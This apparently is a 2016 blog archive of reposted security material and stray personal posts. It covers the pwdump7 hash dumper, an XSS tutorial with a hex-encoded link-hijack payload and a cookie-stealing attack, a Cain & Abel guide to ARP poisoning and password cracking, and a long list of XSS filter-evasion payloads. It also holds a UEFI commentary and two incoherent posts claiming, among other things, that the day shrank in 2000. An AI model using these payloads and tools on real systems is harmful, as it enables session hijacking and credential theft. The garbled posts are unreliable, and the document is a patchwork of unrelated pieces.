Friday, June 10, 2016

password Dumper pwdump7 ( v7.1 )

Introduction

We have developed a new password dumper for windows named PWDUMP7. The main difference between pwdump7 and other pwdump tools is that our tool runs by extracting the binary SAM and SYSTEM File from the Filesystem and then the hashes are extracted. For that task Rkdetector NTFS and FAT32 filesystem drivers are used.

Pwdump7 is also able to extract passwords offline by selecting the target files.

Details

Usage Information: Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es

usage:
pwdump7.exe (Dump system passwords)
pwdump7.exe -s (Dump passwords from files)
pwdump7.exe -d [destionation] (Copy filename to destionation)
pwdump7.exe -h (Show this help)

One of the powerfully features of pwdump7 is that can also be used to dump protected files. You can always copy an used file just executing: pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat.
Note that this tool can only used against SAM and SYSTEM Files. Active directory passwords are stored in the ntds.dit file and currently the stored structure is unknown.

Download pwdump (Windows executable)

http://www.tarasco.org/security/pwdump_7/

XSS Attack Examples (Cross-Site Scripting Attacks)

by Lakshmanan Ganapathy on February 16, 2012

http://www.thegeekstuff.com/2012/02/xss-attack-examples/

In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks.
XSS stands for Cross Site Scripting.
XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting

XSS attacks are broadly classified into 2 types:

Non-Persistent
Persistent

1. Non-Persistent XSS Attack

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

";
echo "Click to Download";
?>

Example 1:

Now the attacker will craft an URL as follows and send it to the victim:

index.php?name=guest

When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:

For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=

In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the tag is echoed

index.php?name=

Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

which is same as:

index.php?name=

Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.

2. Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.
When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.

Examples for Persistent XSS Attack

This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:

There are two types of users: “Admin” and “Normal” user.
When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name.

login.php:

"; } ?> home.php:


";
   echo "List of user's are
";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]
";
   }
 }
 else {
  echo "
";
  echo "Update display name:";
  echo "";
 }
}
}
?>

Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:

My Name

The above information entered by the attacker will be stored in the database (persistent).
Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.
To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3”.
We’ll cover how to use “Tamper Data” in future article of this series.

UNIX/Linux crypto algorithms: crypt()
UNIX/Linux encryption weakness: short key length, human factor
Possible attacks against UNIX/Linux: exhaustive key search / brute force, dictionary
Attacks complexity: 2⁵²

http://www.password-crackers.com/en/category_127/

John The Ripper 1.7

(13817 downloads)

by Solar Designer

	: not tested
	: not tested
	: not tested
	: N/A
	: P2,P3; P4; AMD

Free (GPL) Price: $0.00

Description: A command-line portable utility, optimized for a lot of processors. Its primary purpose is to detect weak Unix passwords. Also supports non-standard crypt() functions, additionaly supports Windows NT LanManager hash.

Elcomsoft Distributed Password Recovery 2.71

(29492 downloads)

by ElcomSoft Co.Ltd.

	: not tested
	: not tested
	: not tested
	: N/A
	: Pentium II/III; Pentium 4; AMD; NVIDIA GPU

Shareware Price: $599.00

Description: High-performance distributed password recovery for forensic and government agencies, password recovery and data recovery services and corporations. Recover the most complex passwords and strong encryption keys in realistic timeframes. Accelerate the recovery by offloading calculations to NVIDIA GPUs and scale to over 10,000 workstations with zero scalability overhead.

THANK YOU SNOWDEN

Introduction
According to the official website, Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
The latest version is faster and contains a lot of new features like APR (ARP Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.
Who Should Use This Tool?
Cain & Abel is a tool that will be quite useful for network administrators, teachers, professional penetration testers, security consultants/professionals, forensic staff and security software vendors.
Requirements
The system requirements needed to successfully setup Cain & Abel are:
– At least 10MB hard disk space
– Microsoft Windows 2000/XP/2003/Vista OS
– Winpcap Packet Driver (v2.3 or above).
– Airpcap Packet Driver (for passive wireless sniffer / WEP cracker).
Learn Ethical Hacking From The Best!
Installation
First we need to download Cain & Abel, so go to the download page www.oxid.it/cain.html .
After downloading it,just run the Self-Installing executable package and follow the installation instructions.
Cain’s Features
Here’s a list of all of Cain’s features that make it a great tool for network penetration testing:

Protected Storage Password Manager	Credential Manager Password Decoder
LSA Secrets Dumper	Dialup Password Decoder
Service Manager	APR (ARP Poison Routing)
Route Table Manager	Network Enumerator
SID Scanner	Remote Registry
Sniffer	Routing Protocol Monitors
Full RDP sessions sniffer for APR	Full SSH-1 sessions sniffer for APR
Full HTTPS sessions sniffer for APR	Full FTPS sessions sniffer for APR
Full POP3S sessions sniffer for APR	Full IMAPS sessions sniffer for APR
Full LDAPS sessions sniffer for APR	Certificates Collector
MAC Address Scanner with OUI fingerprint	Promiscuous-mode Scanner
Wireless Scanner	PWL Cached Password Decoder
802.11 Capture Files Decoder	Password Crackers
Access (9x/2000/XP) Database Passwords Decoder	Cryptanalysis attacks
Base64 Password Decoder	WEP Cracker
Cisco Type-7 Password Decoder	Rainbowcrack-online client
Cisco VPN Client Password Decoder	Enterprise Manager Password Decoder
RSA SecurID Token Calculator	Hash Calculator
TCP/UDP Table Viewer	TCP/UDP/ICMP Traceroute
Cisco Config Downloader/Uploader (SNMP/TFTP)	Box Revealer
Wireless Zero Configuration Password Dumper	Remote Desktop Password Decoder
MSCACHE Hashes Dumper	MySQL Password Extractor
Microsoft SQL Server 2000 Password Extractor	Oracle Password Extractor
VNC Password Decoder	Syskey Decoder

Related Definitions: MAC: (from Wikipedia) “A Media Access Control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in the Media Access Control protocol sub-layer of the OSI reference model.
MAC addresses are most often assigned by the manufacturer of a network interface card (NIC) and are stored in its hardware, the card’s read-only memory, or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number and may be referred to as the burned-in address. It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. A network node may have multiple NICs and will then have one unique MAC address per NIC.”
Sniffing: (fromWikipedia) “A packet analyzer (also known as a network analyzer, protocol analyzer or packet sniffer, or for particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer program or a piece of computer hardware that can intercept and log traffic passing over a digital network or part of a network. As data streams flow across the network, the sniffer captures each packet and, if needed, decodes the packet’s raw data, showing the values of various fields in the packet, and analyzes its content according to the appropriate RFC or other specifications.”
ARP(from Wikipedia) “Address Resolution Protocol (ARP) is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. ARP was defined by RFC 826 in 1982. It is Internet Standard STD 37. It is also the name of the program for manipulating these addresses in most operating systems.”
Usage
Now after launching the application, we have to configure it to use appropriate network card.If you have multiple network cards, it’s better to know the MAC address of the network card that you will use for the sniffer.To get the MAC address of your network interface card, do the following:

1- Open CMD prompt.
/p>

2- Write the following command “ipconfig /all”.

3- Determine the MAC address of the desired Ethernet adapters, write it on Notepad,and then use this information to help determine which NIC to select in the Cain application.

Now clickConfigure on the main menu. It will open the configuration dialog box where you can select the desired network interface card.

Now let’s go through the configuration dialog tabs and take a brief look at most of them:
Sniffer Tab:
This tab allows us to specify which Ethernet interface card we will use for sniffing.

ARP Tab:

This tab allows us to configure ARP poison routing to perform ARP poisoning attack, which tricks the victim’s computer by impersonating other devices to get all traffic that belongs to that device, which is usually the router or an important server.

Filters and Ports Tab:

This tab has the most standard services with their default port running on.You can change the port by right-clicking on the service whose port you want to change and then enabling or disabling it.

Cain’s sniffer filters and application protocol TCP/UDP port.

HTTP Fields Tab:
There are some features of Cain that parse information from web pages viewed by the victim such as LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS,so the more fields you add to the username and passwords fields, the more you capture HTTP usernames and passwords from HTTP and HTTPS requests. Here is an example:
The following cookie uses the fields “logonusername=” and “userpassword=” for authentication purposes. If you don’t include these two fields in the list, the sniffer will not extract relative credentials.
GET /mail/Login?domain=xxxxxx.xx&style=default&plain=0 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

Referer: http://xxx.xxxxxxx.xx/xxxxx/xxxx

Accept-Language: it

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3); .NET CLR 1.1.4322)

Host: xxx.xxxxxx.xx

Connection: Keep-Alive

Cookie: ss=1; logonusername=user@xxxxxx.xx; ss=1; srclng=it; srcdmn=it; srctrg=_blank; srcbld=y; srcauto=on; srcclp=on; srcsct=web; userpassword=password; video=c1; TEMPLATE=default;

Traceroute Tab:
Traceroute is a technique to determine the path between two points by simply counting how many hops the packet will take from the source machine to reach the destination machine. Cain also adds more functionality that allows hostname resolution, Net mask resolution, and Whois information gathering.
Certificate Spoofing Tab:
This tab will allow Certificate spoofing.From Wikipedia:
“In cryptography, a public key certificate (also known as a digital certificate or identity certificate) is an electronic document that uses a digital signature to bind a public key with an identity — information such as the name of a person or an organization, their address, and so forth. The certificate can be used to verify that a public key belongs to an individual.
In a typical public key infrastructure (PKI) scheme, the signature will be of a certificate authority (CA). In a web of trust scheme, the signature is of either the user (a self-signed certificate) or other users (“endorsements”). In either case, the signatures on a certificate are attestations by the certificate signer that the identity information and the public key belong together.”
We can simply think of it as some sort of data (cipher suites & Public key and some other information about the owner of the certificate) that has information about the destination server and is encrypted by trusted companies (CA) that are authorized for creating these types of data.The server sends its own certificate to the client application to make sure it’s talking to the right server.
Certificate Collector Tab:
This tab will collect all certificates back and forth between servers and clients by setting proxy IPs and ports that listen to it.

Challenge Spoofing Tab:

Here you can set the custom challenge value to rewrite into NTLM authentications packets. This feature can be enabled quickly from Cain’s toolbar and must be used with APR. A fixed challenge enables cracking of NTLM hashes captured on the network by means of Rainbow Tables.
Password Cracking
Now it’s time to speak about the cracker tab,the most important feature of Cain.When Cain captures some LM and NTLM hashes or any kind of passwords for any supported protocols, Cain sends them automatically to the Cracker tab.We will import a local SAM file just for demonstration purposes to illustrate this point.Here is how to import the SAM file:

Here are the 4 NTLM and LM hashes which will appear like the following image:

And here you will find all possible password techniques in the following image:

As you can see from the previous image, there are various types of techniques that are very effective in password cracking.We will look at each of their definitions.
Dictionary attack:
From Wikipedia: “A dictionary attack uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (from a pre-arranged list of values). In contrast with a brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words for example a dictionary (hence the phrase dictionary attack). Generally, dictionary attacks succeed because many people have a tendency to choose passwords which are short (7 characters or fewer), single words found in dictionaries or simple, easily predicted variations on words, such as appending a digit. However these are easy to defeat. Adding a single random character in the middle can make dictionary attacks untenable.”
Brute forcing attack:
From Wikipedia: “In cryptography, a brute-force attack, or exhaustive key search, is a cryptanalytic attack that can, in theory, be used against any encrypted data (except for data encrypted in an information-theoretically secure manner). Such an attack might be utilized when it is not possible to take advantage of other weaknesses in an encryption system (if any exist) that would make the task easier. It consists of systematically checking all possible keys until the correct key is found. In the worst case, this would involve traversing the entire search space.
The key length used in the cipher determines the practical feasibility of performing a brute-force attack, with longer keys exponentially more difficult to crack than shorter ones. A cipher with a key length of N bits can be broken in a worst-case time proportional to 2N and an average time of half that. Brute-force attacks can be made less effective by obfuscating the data to be encoded, something that makes it more difficult for an attacker to recognize when he/she has cracked the code. One of the measures of the strength of an encryption system is how long it would theoretically take an attacker to mount a successful brute-force attack against it.”
Cryptanalysis attack (Using Rainbow Table):
From Wikipedia: “A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering the plain text password, up to a certain length consisting of a limited set of characters. It is a practical example of a space-time tradeoff, using more computer processing time at the cost of less storage when calculating a hash on every attempt, or less processing time and more storage when compared to a simple lookup table with one entry per hash. Use of a key derivation function that employ a salt makes this attack infeasible. Rainbow tables are a refinement of an earlier, simpler algorithm by Martin Hellman.”

How To Make A Rainbow Table?

There are many tools that create a rainbow table and there are many rainbow tables already available on the internet.Fortunately, Cain comes with a tool called winrtgen, which is located in its own folder in the installation.

You will need to choose ahash algorithm, minimum andmaximum length of password, and finally the charset that the password will use.Then press OK.

Conclusion

Cain and Abel is a powerful tool that does a great job in password cracking. It can crack almost all kinds of passwords, and it’s usually just a matter of time before you get it.

http://resources.infosecinstitute.com/password-cracking-using-cain-abel/

Thursday, June 9, 2016

the infinite quark 00+-00 charged with N command virus synthetis took 2 million clorate particles to hang over an assymetric LAN where the orbit lives

let me try to divide this: the infinite electrical charge of a null number on a loop command input over a virus cure took 2 million chemical chlorate formulas to live over an orbit which is build on a LAN

why not consider the universe as a vaccum without gas molecules, and make an experience of creating an explosion by the chock of two vaccumns libertation on hydrogene

and let's consider that the hydrogene is the pressure created by the vaccumns

Elsa David

I was crying over here, but not alone; this is so very difficult to swallow, and Jesus did not ask me my opinion, if I would or would not like to be part of a God's plan; Maybe he has a reward of me, I'm not excpeting; but then, nevertheless, God has never been Justice; What's God then? and why do we keep on trying to explain where the universes begun? If the universes are infinite, God is infinite, the beggining is infinite, and the end is infinite; if they have will meet? Well, time as a measure shrinked in the year 2000, there's no more 24 hours, but 23.57 minutes; the universe shrinked then, all the orbits shrinked...are we running for the end? but ...why do we keep on using the same category of measuring? time, has seconds, distance as meters, liquids as gallons??? why not measure a neutron with the measure of virus? of cells composition? and why using numbers for the couting of cells, and not letters? and why are this language letters and not numbers? and why computaion is symbols, letters and numbers, and not cells? and why not giving cells chemical compositions with concepts and not numbers? and so on..as soon we get to think without pre formed languages, with numbers, we might make a different question, and get the answer, who is God, where the begging of "virus" of choloratesynthesis begun?

Wednesday, June 8, 2016

https://issuu.com/alabarga/docs/hacker_s_manual_2015_-_power_up_you/1
PAGE 81

Here is what happens in a minimal system boot:
A typical small ARM-style system doesn't have a 'BIOS' or 'EFI' or anything on it. When you 'turn on' the system then voltage is applied to the 'SoC' and the processor immediately begins executing any code that may exist at address 0x0 (or 0x8000 or whatever it is for that particular processor). This corresponds to physical traces on the motherboard and a flash chip.
That flash will be programmed with your 'Boot loader'. You see the SoC doesn't understand how the hardware is configured or anything like that. It doesn't know what the pins on the processor does or how to use main memory. It doesn't know how to read your SD card or turn on a network interface or anything like that. The bootloader must actually program the low-level interfaces on the SoC to even begin to be using memory or anything like that. As a programmer it would be your job to know how to flip the bits and detect memory so that the computer can begin using it. Then whatever storage device you want to use for the OS.. you have to configure that also. Just a minimal amount to activate the larger storage device and load and execute the Linux kernel.
So a operating system doesn't actually need any sort of 'firmware' at all. There is no absolute need for a BIOS or EUFI or anything like that. The Linux kernel itself can do all the configuration that is necessary, but you need something very specific to that mainboard that knows how to do the lowest levels of configuration.. which is what coreboot is for.
Which is why on your ARM-based phone or MIPS router or whatever you can 'brick' it by a doing a bad bootloader flash. Without a functioning bootloader there is no way to interact with the hardware. (Although modern systems are incorporating more features to avoid these problems and make it more friendly to ham-fisted firmware updaters)
The BIOS originally was developed as a sort of ghetto operating system.
It was designed for a era were you didn't have operating systems. You had single-task machines that when they booted they just launched a single application.
The BIOS then provided a set of functions and resources that applications could use to run. It had some fonts, CGA graphics API, ability to read floppy drives and that sort of thing.
The BIOS really is a API of sorts.
Cracking and cloning the BIOS was a huge step forward for PC systems because for the first time it allowed applications written for one PC to be executed successfully on a PC clone.
Later on people produced disk operating systems... which all they did was provide a file system for managing files on a disk. MS-DOS was one of many for x86 systems, but many other types of architectures had DOS systems as well.
When Microsoft finally started coming out with real operating systems like Windows 95 for the PC the BIOS was used for boot strapping the OS.
The x86 'bootloader' is then really a x86 BIOS program used to launch OSes. Of course Windows 95 wasn't that smart so you still relied on the BIOS to configure bits and pieces of hardware.
Later on, of course, you had things like ACPI so that the OS had a standardized way to interact with the hardware for power management among other things.
So with x86 you had a sort of 'dual OS' thing going were you had this stupid ghetto OS people referred to as the 'BIOS' or 'Firmware' and then the real OS for running applications.
The BIOSes typically are kinda shit. They are going to be specific to specific hardware, but typically how they are programmed is that they are copy and pasted from older mainboard designs and then screwed around with until they boot windows. So in your BIOS-based x86 system you will have lots of bastardized code that is floating around that is designed to run hardware from 20 years ago.
This sort of thing is why Linux kernel programmers have to spend a great deal of time 'undoing' the damage caused to your system by it's BIOS.
These sorts of things have some benefits, of course. When you load a OS and bootloader for x86 the hardware is 'made generic' through the use of the BIOS. If you ever tried to build your own OS for a smart phone you'd realize that you need to program and build the kernel and bootloader for that specific device... that is a kernel/bootloader from a different system won't work because the hardware is different. With X86 systems the BIOS hides the details and allows a single binary bootloader and kernel to easily work across a wide variety of systems.
UEFI, is then, a modernized BIOS. Instead of having a mixture of ancient x86 machine code and assembly written by retarded monkeys they have much more 'modern' approach.
It is much more sophisticated and flexible. It has it's own programming languages and interpreters. Firmware on UEFI-enabled devices like video cards can load their own 'drivers' that allow them to be used directly by UEFI.
All sorts of crap like that.
Which is why now you can have these really fancy 'graphical' EUFI configuration screens. The UEFI firmware on your peripheral devices can provide rich interfaces for how to interact with the hardware.
Unfortunately this means that it's extremely complicated and big. The firmware is now as big and complicated as a full-fledged OS.
Complicated and big is bad. This means more bugs. Some bugs are security bugs so more bugs means more security holes. Also it's generally proprietary so you have different groups of people trying to write the same thing from scratch so they can inject their 'secret sauce'. So now not only you have something that is big and buggy, but also has lots of different sets of unique bugs.
But it still allows Microsoft to crank out one binary that works generically across a bunch of different hardware.
Also it allows for a lot of fancy new ways to manage your hardware independently of the OS. Which while often convenient it is also going to be full of bugs and is proprietary. Which is going to be especially bad when the UEFI stuff allows for remote configuration and will piggy back on your network interfaces and doesn't go away completely when the real OS is loaded.
edit:
Thank you for the reddit gold very much.

https://www.reddit.com/r/linux/comments/37c38l/uefi_backdoor_allows_root_exploit_in_linux/

Tuesday, June 7, 2016

HTML Purifier XSS Attacks Smoketest ( http://htmlpurifier.org/live/smoketests/xssAttacks.php)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

Name	Raw	Output	Render
XSS Locator	';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//-->

» CRIPT>">'>» >

SCRIPT w/Source File

SCRIPT w/Char Code

BASE

»

HREF="javascript:alert('XSS' » );//">

BGSOUND

»

SRC="javascript:alert('XSS') » ;">

BODY background-image

»

BACKGROUND="javascript:alert » ('XSS');">

BODY ONLOAD

DIV background-image 1

»

STYLE="background-image: » url(javascript:alert('XSS')) » ">

DIV background-image 2

»

STYLE="background-image: » url(javascript:alert('XS » S'))">

DIV expression

»

expression(alert('XSS'));">

FRAME

»

SRC="javascript:alert('XSS') » ;">

IFRAME

&#187;</span>
SRC="javascript:alert('XSS') <span class="linebreak">&#187;</span>
;">

INPUT Image

»

SRC="javascript:alert('XSS') » ;">

IMG w/JavaScript Directive

»

SRC="javascript:alert('XSS') » ;">

IMG No Quotes/Semicolon

»

SRC=javascript:alert('XSS')>

IMG Dynsrc

»

DYNSRC="javascript:alert('XS » S');">

IMG Lowsrc

»

LOWSRC="javascript:alert('XS » S');">

IMG Embedded commands 1

»

SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">

»

src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />

IMG STYLE w/expression

exp/*»

STYLE='no\xss:noxss("*//*"); » xss:ex/*XSS*//*/* » /pression(alert("XSS"))'>

exp/*

exp/*

List-style-image

XSS

XSS

IMG w/VBscript

»

SRC='vbscript:msgbox("XSS")' » >

LAYER

»

SRC="http://ha.ckers.org/scr » iptlet.html">

Livescript

»

SRC="livescript:[code]">

US-ASCII encoding

scriptalert(XSS)/script »

scriptalert(XSS)/script

scriptalert(XSS)/script

BLACK MASK